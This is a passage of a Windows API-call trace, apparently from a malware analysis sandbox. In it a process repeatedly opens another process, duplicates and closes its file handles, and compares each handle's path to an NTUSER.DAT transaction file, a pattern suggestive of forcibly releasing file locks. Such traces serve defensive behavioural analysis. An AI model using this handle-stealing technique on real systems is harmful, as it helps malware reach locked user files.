hSourceProcessHandle=0x1e8, hSourceHandle=0x298, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.134] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.134] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.134] CloseHandle (hObject=0x1e4) returned 1 [0166.135] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.135] CloseHandle (hObject=0x194) returned 1 [0166.135] CloseHandle (hObject=0x1e8) returned 1 [0166.135] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.135] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.135] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.135] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.136] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.136] CloseHandle (hObject=0x1e4) returned 1 [0166.136] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.136] CloseHandle (hObject=0x194) returned 1 [0166.137] CloseHandle (hObject=0x1e8) returned 1 [0166.137] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.137] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.137] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.137] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.138] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.138] CloseHandle (hObject=0x1e4) returned 1 [0166.138] _wcsicmp (_Str1="\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.138] CloseHandle (hObject=0x194) returned 1 [0166.138] CloseHandle (hObject=0x1e8) returned 1 [0166.138] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.139] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.139] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.139] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.140] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.140] CloseHandle (hObject=0x1e4) returned 1 [0166.140] _wcsicmp (_Str1="\\comctl32.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0166.140] CloseHandle (hObject=0x194) returned 1 [0166.140] CloseHandle (hObject=0x1e8) returned 1 [0166.140] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.140] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x2e0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.140] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.141] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.142] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.142] CloseHandle (hObject=0x1e4) returned 1 [0166.142] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.142] CloseHandle (hObject=0x194) returned 1 [0166.142] CloseHandle (hObject=0x1e8) returned 1 [0166.142] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.142] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.142] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.143] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.144] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.144] CloseHandle (hObject=0x1e4) returned 1 [0166.144] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.144] CloseHandle (hObject=0x194) returned 1 [0166.144] CloseHandle (hObject=0x1e8) returned 1 [0166.144] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.144] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x394, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.144] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.145] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.146] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.146] CloseHandle (hObject=0x1e4) returned 1 [0166.146] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.146] CloseHandle (hObject=0x194) returned 1 [0166.146] CloseHandle (hObject=0x1e8) returned 1 [0166.146] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.146] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x404, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.146] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.147] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.148] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.148] CloseHandle (hObject=0x1e4) returned 1 [0166.148] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0166.148] CloseHandle (hObject=0x194) returned 1 [0166.148] CloseHandle (hObject=0x1e8) returned 1 [0166.148] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.148] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x408, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.148] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.149] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.150] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.150] CloseHandle (hObject=0x1e4) returned 1 [0166.150] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.150] CloseHandle (hObject=0x194) returned 1 [0166.150] CloseHandle (hObject=0x1e8) returned 1 [0166.150] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.150] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x44c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.151] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.152] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.152] CloseHandle (hObject=0x1e4) returned 1 [0166.152] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0166.152] CloseHandle (hObject=0x194) returned 1 [0166.153] CloseHandle (hObject=0x1e8) returned 1 [0166.153] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.153] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x458, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.153] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.153] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.154] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.154] CloseHandle (hObject=0x1e4) returned 1 [0166.154] _wcsicmp (_Str1="\\Libraries", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0166.154] CloseHandle (hObject=0x194) returned 1 [0166.155] CloseHandle (hObject=0x1e8) returned 1 [0166.155] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.155] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.155] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.156] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.156] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.156] CloseHandle (hObject=0x1e4) returned 1 [0166.157] _wcsicmp (_Str1="\\User Pinned", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 7 [0166.157] CloseHandle (hObject=0x194) returned 1 [0166.157] CloseHandle (hObject=0x1e8) returned 1 [0166.157] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.157] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.157] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.158] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.159] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.159] CloseHandle (hObject=0x1e4) returned 1 [0166.159] _wcsicmp (_Str1="\\index.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.159] CloseHandle (hObject=0x194) returned 1 [0166.159] CloseHandle (hObject=0x1e8) returned 1 [0166.159] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.159] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.159] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.160] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.161] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.161] CloseHandle (hObject=0x1e4) returned 1 [0166.161] _wcsicmp (_Str1="\\thumbcache_idx.db", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 6 [0166.161] CloseHandle (hObject=0x194) returned 1 [0166.161] CloseHandle (hObject=0x1e8) returned 1 [0166.161] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.161] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4f4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.162] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.163] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.163] CloseHandle (hObject=0x1e4) returned 1 [0166.163] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.163] CloseHandle (hObject=0x194) returned 1 [0166.163] CloseHandle (hObject=0x1e8) returned 1 [0166.163] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.163] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4fc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.163] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.164] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.165] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.165] CloseHandle (hObject=0x1e4) returned 1 [0166.165] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.165] CloseHandle (hObject=0x194) returned 1 [0166.165] CloseHandle (hObject=0x1e8) returned 1 [0166.165] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.165] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x504, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.165] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.166] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.167] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.167] CloseHandle (hObject=0x1e4) returned 1 [0166.167] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.167] CloseHandle (hObject=0x194) returned 1 [0166.167] CloseHandle (hObject=0x1e8) returned 1 [0166.167] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.167] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x50c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.168] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.169] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.169] CloseHandle (hObject=0x1e4) returned 1 [0166.169] _wcsicmp (_Str1="\\Start Menu", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.169] CloseHandle (hObject=0x194) returned 1 [0166.169] CloseHandle (hObject=0x1e8) returned 1 [0166.169] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.169] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x514, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.169] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.170] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.171] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.171] CloseHandle (hObject=0x1e4) returned 1 [0166.171] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.171] CloseHandle (hObject=0x194) returned 1 [0166.171] CloseHandle (hObject=0x1e8) returned 1 [0166.171] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.171] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x51c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.172] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.173] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.173] CloseHandle (hObject=0x1e4) returned 1 [0166.173] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.173] CloseHandle (hObject=0x194) returned 1 [0166.173] CloseHandle (hObject=0x1e8) returned 1 [0166.173] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.173] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x524, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.174] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.175] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.175] CloseHandle (hObject=0x1e4) returned 1 [0166.175] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.175] CloseHandle (hObject=0x194) returned 1 [0166.175] CloseHandle (hObject=0x1e8) returned 1 [0166.175] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.175] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x52c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.175] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.176] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.176] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.177] CloseHandle (hObject=0x1e4) returned 1 [0166.177] _wcsicmp (_Str1="\\Desktop", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -10 [0166.177] CloseHandle (hObject=0x194) returned 1 [0166.177] CloseHandle (hObject=0x1e8) returned 1 [0166.177] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.177] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x534, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.177] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.178] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.179] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.179] CloseHandle (hObject=0x1e4) returned 1 [0166.179] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0166.179] CloseHandle (hObject=0x194) returned 1 [0166.179] CloseHandle (hObject=0x1e8) returned 1 [0166.179] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.179] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x53c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.179] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.180] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.181] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.181] CloseHandle (hObject=0x1e4) returned 1 [0166.181] _wcsicmp (_Str1="\\Burn", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -12 [0166.181] CloseHandle (hObject=0x194) returned 1 [0166.181] CloseHandle (hObject=0x1e8) returned 1 [0166.181] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x454) returned 0x1e8 [0166.181] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x554, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 